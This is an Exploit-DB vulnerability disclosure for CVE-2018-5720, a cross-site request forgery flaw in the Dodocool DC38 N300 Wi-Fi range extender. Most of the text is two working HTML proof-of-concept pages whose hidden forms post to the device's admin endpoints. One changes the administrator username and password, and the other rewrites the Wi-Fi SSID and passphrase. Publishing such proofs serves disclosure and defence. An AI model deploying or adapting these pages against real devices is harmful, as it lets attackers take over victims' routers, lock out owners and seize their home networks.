Dodocool DC38 N300 - Cross-site Request Forgery

EDB-ID: 43898
Author: Raffaele Sabato
Published: 2018-01-26
CVE: CVE-2018-5720
Type: Webapps
Platform: Hardware
Vulnerable App: N/A

 # Date: 17-01-2018 
 # Exploit Authors: Raffaele Sabato 
 # Contact: https://twitter.com/syrion89 
 # Vendor: DODOCOOL 
 # Vendor Homepage: www.dodocool.com 
 # Version: RTN2-AW.GD.R3465.1.20161103 
 # CVE: CVE-2018-5720 
  
 I DESCRIPTION 
 ======================================================================== 
  
 An issue was discovered in DODOCOOL DC38 3-in-1 N300 Mini Wireless Range 
 Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery 
 (CSRF) vulnerability allows remote attackers to hijack the authentication 
 of users for requests that modify the configuration. 
 This vulnerability may lead to username and/or password changing, Wi-Fi 
 password changing, etc. 
  
 II PROOF OF CONCEPT 
 ======================================================================== 
  
 ## Change user username and password (test_username:test_password): 
  
 <html> 
   <body> 
   <script>history.pushState('', '', '/')</script> 
     <form action="http://192.168.10.1/boafrm/formPasswordSetup" 
 method="POST"> 
       <input type="hidden" name="submit&#45;url" 
 value="&#47;setok&#46;htm&#63;bw&#61;main&#46;htm" /> 
       <input type="hidden" name="submit&#45;value" value="" /> 
       <input type="hidden" name="username" value="test&#95;username" /> 
       <input type="hidden" name="newpass" value="test&#95;password" /> 
       <input type="hidden" name="confpass" value="test&#95;password" /> 
       <input type="submit" value="Submit request" /> 
     </form> 
   </body> 
 </html> 
  
  
 ## Change WiFi Configuration (WIFI_TEST:TestTest): 
  
 <html> 
   <body> 
   <script>history.pushState('', '', '/')</script> 
     <form action="http://192.168.10.1/boafrm/formWlanSetupREP" 
 method="POST"> 
       <input type="hidden" name="submit&#45;url" 
 value="&#47;setok&#46;htm&#63;bw&#61;wl&#95;rep&#46;htm" /> 
       <input type="hidden" name="submit&#45;value" value="repset" /> 
       <input type="hidden" name="wl&#95;onoff" value="0" /> 
       <input type="hidden" 
 name="wps&#95;clear&#95;configure&#95;by&#95;reg" value="0" /> 
       <input type="hidden" name="wlProfileId" value="" /> 
       <input type="hidden" name="wl&#95;mode" value="0" /> 
       <input type="hidden" name="wl&#95;authType" value="auto" /> 
       <input type="hidden" name="wepEnabled" value="ON" /> 
       <input type="hidden" name="weplength" value="" /> 
       <input type="hidden" name="wepformat" value="" /> 
       <input type="hidden" name="wl&#95;wpaAuth" value="psk" /> 
       <input type="hidden" name="wl&#95;pskFormat" value="0" /> 
       <input type="hidden" name="wl&#95;pskValue" value="TestTest" /> 
       <input type="hidden" name="wl&#95;ssid" value="WIFI_TEST" /> 
       <input type="hidden" name="wl&#95;Method" value="6" /> 
       <input type="hidden" name="wep&#95;key" value="" /> 
       <input type="hidden" name="ciphersuite" value="tkip&#43;aes" /> 
       <input type="hidden" name="ciphersuite" value="aes" /> 
       <input type="hidden" name="wpa2ciphersuite" value="tkip&#43;aes" /> 
       <input type="hidden" name="wpa2ciphersuite" value="aes" /> 
       <input type="hidden" name="web&#95;pskValue" value="TestTest" /> 
       <input type="submit" value="Submit request" /> 
     </form> 
   </body> 
 </html>

Source: www.exploit-db.com